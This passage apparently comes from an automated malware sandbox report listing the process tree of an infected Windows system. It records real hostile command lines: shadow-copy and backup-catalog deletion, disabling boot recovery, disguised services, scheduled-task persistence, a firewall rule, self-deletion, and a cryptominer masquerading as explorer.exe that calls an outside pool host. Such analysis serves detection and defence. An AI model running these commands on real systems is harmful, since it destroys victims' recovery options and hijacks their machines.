    PID:7888
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1044
    3⤵
    - Program crash
    PID:6700
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1336
    3⤵
    - Program crash
    PID:7432
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1456
    3⤵
    - Program crash
    PID:3412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1500
    3⤵
    - Program crash
    PID:6904

C:\Users\Admin\AppData\Local\Temp\is-SC51C.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SC51C.tmp\MediaBurner2.tmp" /SL5="$103B4,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
1⤵
PID:5280
- C:\Users\Admin\AppData\Local\Temp\is-7SL4N.tmp\ultradumnibour.exe
  "C:\Users\Admin\AppData\Local\Temp\is-7SL4N.tmp\ultradumnibour.exe" /S /UID=burnerch2
  2⤵
  PID:2696
- - C:\Program Files\Microsoft Office 15\JDGXMKWCRX\ultramediaburner.exe
    "C:\Program Files\Microsoft Office 15\JDGXMKWCRX\ultramediaburner.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4744
  - - C:\Users\Admin\AppData\Local\Temp\is-PHPLQ.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-PHPLQ.tmp\ultramediaburner.tmp" /SL5="$10592,281924,62464,C:\Program Files\Microsoft Office 15\JDGXMKWCRX\ultramediaburner.exe" /VERYSILENT
      4⤵
      PID:2732
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        
        PID:7424
- - C:\Users\Admin\AppData\Local\Temp\9b-6afd7-d66-f4292-590c9b862501b\Lepigypocu.exe
    "C:\Users\Admin\AppData\Local\Temp\9b-6afd7-d66-f4292-590c9b862501b\Lepigypocu.exe"
    3⤵
    PID:6452
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uyjzeinb.nxo\GcleanerEU.exe /eufive & exit
      4⤵
      PID:8844
    - - C:\Users\Admin\AppData\Local\Temp\uyjzeinb.nxo\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\uyjzeinb.nxo\GcleanerEU.exe /eufive
        5⤵
        
        PID:8864
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\uyjzeinb.nxo\GcleanerEU.exe" & exit
        6⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:8576
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3byu0n1r.j50\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:6896
    - - C:\Users\Admin\AppData\Local\Temp\3byu0n1r.j50\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\3byu0n1r.j50\installer.exe /qn CAMPAIGN="654"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:880
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a2dmjghp.fiu\anyname.exe & exit
      4⤵
      PID:8716
    - - C:\Users\Admin\AppData\Local\Temp\a2dmjghp.fiu\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\a2dmjghp.fiu\anyname.exe
        5⤵
        
        PID:6608
      - C:\Users\Admin\AppData\Local\Temp\a2dmjghp.fiu\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a2dmjghp.fiu\anyname.exe" -q
        6⤵
        
        PID:9540
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ma0fys2.b1o\gcleaner.exe /mixfive & exit
      4⤵
      PID:5712
    - - C:\Users\Admin\AppData\Local\Temp\0ma0fys2.b1o\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\0ma0fys2.b1o\gcleaner.exe /mixfive
        5⤵
        
        PID:9620
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0ma0fys2.b1o\gcleaner.exe" & exit
        6⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:7932
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjis53pk.5hq\autosubplayer.exe /S & exit
      4⤵
      PID:9152
- - C:\Users\Admin\AppData\Local\Temp\be-327de-e67-d4cb6-7accf98f2f170\Bepozhaenaetae.exe
    "C:\Users\Admin\AppData\Local\Temp\be-327de-e67-d4cb6-7accf98f2f170\Bepozhaenaetae.exe"
    3⤵
    PID:6052
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 2268
      4⤵
      PID:4872

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6344
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6576

C:\ProgramData\vdvdq\xsvtpn.exe
C:\ProgramData\vdvdq\xsvtpn.exe start
1⤵
PID:6656

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6668
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6C361ACA3FF90A31C8151D519AF8DB6C C
  2⤵
  PID:1476
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 490EA2DABB941152CE2C8ED804EE60A2 C
  2⤵
  PID:7340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 45B64C9DA4A5CDB6ACBA0ED025A32F9B
  2⤵
  PID:8320
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BBACCE0B73C50DA480F69FA164246154 C
  2⤵
  PID:7236
- C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
  2⤵
  PID:5528
- - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
    3⤵
    PID:2804
  - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
      4⤵
      PID:5252
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x19c,0x1c0,0x1e4,0x1a4,0x1e8,0x7ffae10bdec0,0x7ffae10bded0,0x7ffae10bdee0
        5⤵
        
        PID:10456
      - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff64dbf9e70,0x7ff64dbf9e80,0x7ff64dbf9e90
        6⤵
        
        PID:9384
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=1732 /prefetch:8
        5⤵
        
        PID:10052
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:2
        5⤵
        
        PID:4384
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=2076 /prefetch:8
        5⤵
        
        PID:8216
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2060 /prefetch:1
        5⤵
        
        PID:6232
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2560 /prefetch:1
        5⤵
        
        PID:668
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=3064 /prefetch:8
        5⤵
        
        PID:11160
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3132 /prefetch:2
        5⤵
        
        PID:9676
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=3788 /prefetch:8
        5⤵
        
        PID:8576
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=3292 /prefetch:8
        5⤵
        
        PID:828
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=3416 /prefetch:8
        5⤵
        
        PID:4136
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,4161012060640212286,18178677806832677165,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5252_1186089866" --mojo-platform-channel-handle=3372 /prefetch:8
        5⤵
        
        PID:10816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BA27.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
    3⤵
    PID:9232

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7788
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9364

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9792

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5132

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9932
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7416

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9768
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5e34ecef-8cf0-5f49-8a34-716ecc4e9a1d}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4388
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
  2⤵
  PID:10828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:11232

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10516

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:10316
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7924

C:\Users\Admin\AppData\Local\Temp\2D47.exe
C:\Users\Admin\AppData\Local\Temp\2D47.exe
1⤵
PID:10804

C:\Users\Admin\AppData\Local\Temp\30D2.exe
C:\Users\Admin\AppData\Local\Temp\30D2.exe
1⤵
PID:11040

C:\Users\Admin\AppData\Local\Temp\449A.exe
C:\Users\Admin\AppData\Local\Temp\449A.exe
1⤵
PID:7416

C:\Users\Admin\AppData\Local\Temp\47E7.exe
C:\Users\Admin\AppData\Local\Temp\47E7.exe
1⤵
PID:10756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yrwnhwyt\
  2⤵
  PID:6528
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fjmiudaw.exe" C:\Windows\SysWOW64\yrwnhwyt\
  2⤵
  PID:9196
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create yrwnhwyt binPath= "C:\Windows\SysWOW64\yrwnhwyt\fjmiudaw.exe /d\"C:\Users\Admin\AppData\Local\Temp\47E7.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:3360
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description yrwnhwyt "wifi internet conection"
  2⤵
  PID:4200
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start yrwnhwyt
  2⤵
  PID:3368
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:9684

C:\Users\Admin\AppData\Local\Temp\5044.exe
C:\Users\Admin\AppData\Local\Temp\5044.exe
1⤵
PID:10696

C:\Users\Admin\AppData\Local\Temp\617B.exe
C:\Users\Admin\AppData\Local\Temp\617B.exe
1⤵
PID:11004

C:\Users\Admin\AppData\Local\Temp\836C.exe
C:\Users\Admin\AppData\Local\Temp\836C.exe
1⤵
PID:2304

C:\Users\Admin\AppData\Local\Temp\86E8.exe
C:\Users\Admin\AppData\Local\Temp\86E8.exe
1⤵
PID:9956
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
  2⤵
  PID:10936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:7708
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
    3⤵
    PID:8344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:8548
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:7540
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:10964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:11244
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:7824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:10508
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:9572
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:7728
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:9372
- - C:\Windows\SysWOW64\notepad.exe
    notepad.exe
    3⤵
    PID:8600
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:8080

C:\Users\Admin\AppData\Local\Temp\90BC.exe
C:\Users\Admin\AppData\Local\Temp\90BC.exe
1⤵
PID:1040
- C:\Users\Admin\Documents\Update.exe
  "C:\Users\Admin\Documents\Update.exe"
  2⤵
  PID:10548
- - C:\Users\Admin\AppData\Local\Temp\Clip_.exe
    "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
    3⤵
    PID:9436
- - C:\Users\Admin\AppData\Local\Temp\Red1_.exe
    "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
    3⤵
    PID:7172
- - C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
    3⤵
    PID:7936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
      4⤵
      PID:10960
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:6752
  - - C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
      "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
      4⤵
      PID:9828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
        5⤵
        
        PID:8360
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:8448
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:10248
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
        5⤵
        
        PID:9536
- - C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
    3⤵
    PID:1848
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
      4⤵
      PID:4100
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:6868
  - - C:\Users\Admin\AppData\Roaming\VideoDriver.exe
      "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
      4⤵
      PID:9044
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
        5⤵
        
        PID:1048
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:10632
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        5⤵
        
        PID:10088
- - C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
    "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\90BC.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\90BC.exe"
  2⤵
  PID:8864
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 100
    3⤵
    - Runs ping.exe
    PID:11252
